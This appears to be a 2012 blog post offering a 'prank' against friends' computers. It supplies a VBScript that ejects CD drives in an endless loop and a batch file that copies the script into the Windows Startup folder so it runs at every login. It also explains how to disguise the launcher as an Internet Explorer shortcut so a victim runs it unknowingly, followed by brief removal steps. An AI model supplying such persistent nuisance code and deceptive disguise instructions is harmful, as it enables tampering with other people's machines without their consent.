Wednesday 25 July 2012

Hack Your Friends Laptops Or Desktop And Make Them Beg


Here will shall be using a VBS script that opens a CD drive every time found closed. To create this script open your  Notepad (any basic ANSI standard text editor) and copy the codes below into it and save as CDfun.vbs and do not forget the .vbs part


set wmp = createObject("wmplayer.ocx.7")
set drives = wmp.cdromCollection

sub open_saysame()
on error resume next
do
if drives.count >= 1 then
for i = 0 to drives.count - 1
drives.item(i).eject()
next
end if
loop
end sub

open_saysame()


Now your friends are in trouble but what if every time he/ she start his/her computer it loaded? that could make it even better... so open a new notepad document (blank) and insert this code into it
NOTE: numbered to show which line it is.

1:)copy CDfun.vbs "c:\Documents and Settings\%username%\Start Menu\Programs\Startup\"
2:)CDfun.vbs

Save this as run.bat, now to make your friends not to be suspicious. all you need to do is get them to somehow open this run.bat. there are many ways.one way is to make a shortcut to it called "internet Explorer" and right click to change properties on icon. that way it will look just like Internet Explorer. Or you simply create a shortcut for the script and rename the shortcut to a program your friend will always open this can be done by the following steps:
  1. Right click on your desktop and scroll down to new
  2. Select new shortcut
  3. If a wizard pop up follow the steps given
  4. Or right click on the shortcut and click on properties
  5. Change the name to something like "internet Explorer" and also change the icon to that of internet Explorer
  6. So anytime your friend click on it, the CD drives will be open


How to stop This Thing???
open
task Manager > processes> wscript.exe
right click on it > end process tree.

happy hacking...

1 comments:

  1. Thanks for enhanced my information. I was search information Laptops hacking for a long time. thanks

    ReplyDelete

Please drop your feedback in the comment box, for us to know how this post has helped. And don't forget to join, by using the 'Join this site' button on the right. Thank you

Related Posts Plugin for WordPress, Blogger...
 
Blogger Widgets Twitter Bird Gadget